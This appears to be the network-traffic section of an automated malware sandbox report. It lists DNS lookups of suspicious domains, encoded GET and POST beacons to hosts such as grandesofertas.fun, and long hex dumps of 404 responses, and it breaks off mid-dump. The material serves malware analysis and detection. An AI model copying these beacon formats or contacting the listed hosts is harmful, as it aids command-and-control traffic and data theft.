    GET /ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP HTTP/1.1
    Host: www.questmatch.pro
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; DNS traffic detected: DNS query: www.aziziyeescortg.xyz
Source: global traffic; DNS traffic detected: DNS query: www.grandesofertas.fun
Source: global traffic; DNS traffic detected: DNS query: www.sankan-fukushi.info
Source: global traffic; DNS traffic detected: DNS query: www.conansog.shop
Source: global traffic; DNS traffic detected: DNS query: www.beythome.online
Source: global traffic; DNS traffic detected: DNS query: www.tempatmudisini06.click
Source: global traffic; DNS traffic detected: DNS query: www.questmatch.pro
Source: global traffic; DNS traffic detected: DNS query: www.callyur.shop
Source: unknown; HTTP traffic detected:
    POST /5rfk/ HTTP/1.1
    Host: www.grandesofertas.fun
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Content-Length: 217
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Origin: http://www.grandesofertas.fun
    Referer: http://www.grandesofertas.fun/5rfk/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
    Data Ascii: wVb0=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKHQOFUe1uLIKV0GCnPnbLXhwji11r8C4RI8xL4rk+xGaBWugSQ==
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 18:39:33 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ws1lCkjiKO0ZV4eViArTQK3vRWHTs2nG1AnsOiSIeRVTq556BXw%2BWBStqVgc5GM9HnEvtCInPQCU4Kny%2Fd44GCNTrvHSeTJIMUBuF5btHW1WzOMKOuCqNEEJ8fLVrQ5d%2BJFFamZNe8"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed628d889210f93-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:06 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 
20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:09 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 
20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 
20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:14 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 18:41:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T18:41:28.7071560Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
